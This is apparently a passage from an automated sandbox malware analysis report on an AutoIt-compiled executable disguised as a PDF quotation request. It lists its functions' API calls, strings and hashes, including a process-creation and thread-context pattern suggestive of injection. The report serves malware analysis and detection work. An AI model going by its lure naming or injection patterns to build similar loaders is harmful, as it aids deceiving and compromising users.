                                                                    • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                    • String ID:
                                                                    • API String ID: 3300667738-0
                                                                    • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                    • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                    • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                    • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                    Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$CloseOpen
                                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                                    • API String ID: 1586453840-614718249
                                                                    • Opcode ID: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
                                                                    • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                    • Opcode Fuzzy Hash: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
                                                                    • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                    Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                    • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                    • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateShow
                                                                    • String ID: AutoIt v3$edit
                                                                    • API String ID: 1584632944-3779509399
                                                                    • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                    • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                    • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                    • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                    Function 032623F8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 032622E8: Sleep.KERNELBASE(000001F4), ref: 032622F9
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03262544
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileSleep
                                                                    • String ID: BSTMXWRUSQDSRRNWUDE0XHNG3EJFN
                                                                    • API String ID: 2694422964-2950180723
                                                                    • Opcode ID: 18fa8a459333df37cc0c69326f8e8fb4e584a9b8107993eb917bbe681c43583e
                                                                    • Instruction ID: 320a14dc668cc0a4fe8f1c39d59d472aa3f062e7fd6b061bcde2be07fe59c223
                                                                    • Opcode Fuzzy Hash: 18fa8a459333df37cc0c69326f8e8fb4e584a9b8107993eb917bbe681c43583e
                                                                    • Instruction Fuzzy Hash: 04616430D18388DAEF11DBB4C858BDEBB75AF19305F044598E2587B2C1D7F91A88CBA5
                                                                    Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                    • _wcsncpy.LIBCMT ref: 00401C41
                                                                    • _wcscpy.LIBCMT ref: 00401C5D
                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                    • String ID: Line:
                                                                    • API String ID: 1874344091-1585850449
                                                                    • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                    • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                    • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                    • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                    Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                    • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                    • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Close$OpenQueryValue
                                                                    • String ID: Control Panel\Mouse
                                                                    • API String ID: 1607946009-824357125
                                                                    • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                    • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                    • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                    • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                    Function 032612E8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03261AA3
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03261B39
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03261B5B
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                    • Instruction ID: 6bdfac76819a324b34a896cd7444da8db539be8e028b3cadabfaf32e63854801
                                                                    • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                    • Instruction Fuzzy Hash: A8620C34A24258DBEB24CFA4C840BDEB376EF58700F1091A9D10DEB294E775AED1CB59
                                                                    Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                    • String ID:
                                                                    • API String ID: 2782032738-0
                                                                    • Opcode ID: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
                                                                    • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                    • Opcode Fuzzy Hash: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
                                                                    • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                    Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                    • _free.LIBCMT ref: 004295A0
                                                                      • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                      • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                      • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                      • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                      • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                      • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                    • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                    • API String ID: 3938964917-4220473358
                                                                    • Opcode ID: 2f9ae14d77bbf766ff9b4e376899c75dd6e4a1bb155ade5769143cf33dfc50f0
                                                                    • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                    • Opcode Fuzzy Hash: 2f9ae14d77bbf766ff9b4e376899c75dd6e4a1bb155ade5769143cf33dfc50f0
                                                                    • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                    Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: Error:
                                                                    • API String ID: 4104443479-232661952
                                                                    • Opcode ID: 0dca5eb63b397adb51b239d8a9923d05ad9c11b176ecbb19213fdb016a3a367d
                                                                    • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                    • Opcode Fuzzy Hash: 0dca5eb63b397adb51b239d8a9923d05ad9c11b176ecbb19213fdb016a3a367d
                                                                    • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                    Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,0040F545,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,004A90E8,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,?,0040F545), ref: 0041013C
                                                                      • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                      • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                      • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                      • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                    • String ID: X$pWH
                                                                    • API String ID: 85490731-941433119
                                                                    • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                    • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                    • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                    • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                    Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock_memmove
                                                                    • String ID: EA06
                                                                    • API String ID: 1988441806-3962188686
                                                                    • Opcode ID: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
                                                                    • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                    • Opcode Fuzzy Hash: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
                                                                    • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                    Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • C:\Users\user\Desktop\Quotation request -30112024_pdf.exe, xrefs: 00410107
                                                                    • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _strcat
                                                                    • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                    • API String ID: 1765576173-569545537
                                                                    • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                    • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                    • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                    • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                    Function 00431E1F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00431E4C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$FileNamePath
                                                                    • String ID: aut
                                                                    • API String ID: 3285503233-3010740371
                                                                    • Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                    • Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
                                                                    • Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                    • Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
                                                                    Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                                    • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                    • Opcode Fuzzy Hash: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                                    • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                    Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                                    Download Yara Rule
